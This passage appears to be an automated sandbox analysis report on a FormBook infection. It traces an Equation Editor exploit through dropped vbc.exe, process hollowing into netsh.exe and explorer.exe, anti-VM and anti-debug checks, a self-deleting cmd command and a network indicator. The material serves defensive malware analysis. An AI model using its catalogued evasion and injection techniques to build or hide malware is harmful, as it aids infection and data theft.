Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B7F2 push eax; ret 8_2_0009B7F8

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\vbc.exe Code function: 4_2_10008836 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_10008836
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2724 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 2628 Thread sleep time: -30000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405E93 FindFirstFileA,FindClose, 4_2_00405E93
Source: C:\Users\Public\vbc.exe Code function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_004054BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402671 FindFirstFileA, 4_2_00402671
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.506645799.0000000008374000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.512518257.000000000457A000.00000004.00000001.sdmp Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________'
Source: explorer.exe, 00000006.00000000.512518257.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.493761978.00000000005C4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.521416523.00000000044E7000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Co>
Source: explorer.exe, 00000006.00000000.508758981.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: vbc.exe, 00000004.00000002.493761978.00000000005C4000.00000004.00000020.sdmp Binary or memory string: ^ECVMWar_VMware
Source: explorer.exe, 00000006.00000000.505152521.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000CDB2 IsDebuggerPresent, 4_2_1000CDB2
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\Public\vbc.exe Code function: 4_2_100093F8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 4_2_100093F8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 4_2_100098C2 GetProcessHeap, 4_2_100098C2
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A402 mov eax, dword ptr fs:[00000030h] 4_2_1001A402
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A616 mov eax, dword ptr fs:[00000030h] 4_2_1001A616
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A6C7 mov eax, dword ptr fs:[00000030h] 4_2_1001A6C7
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A706 mov eax, dword ptr fs:[00000030h] 4_2_1001A706
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A744 mov eax, dword ptr fs:[00000030h] 4_2_1001A744
Source: C:\Users\Public\vbc.exe Code function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h] 5_2_009226F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C826F8 mov eax, dword ptr fs:[00000030h] 8_2_00C826F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B30 LdrLoadDll, 5_2_00409B30
Source: C:\Users\Public\vbc.exe Code function: 4_2_10009B60 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_10009B60

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Domain query: www.washingtonboatrentals.com
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1640000
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 4_2_100098DF cpuid 4_2_100098DF
Source: C:\Users\Public\vbc.exe Code function: 4_2_10012E10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_10012E10
Source: C:\Users\Public\vbc.exe Code function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 4_2_004030FB

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY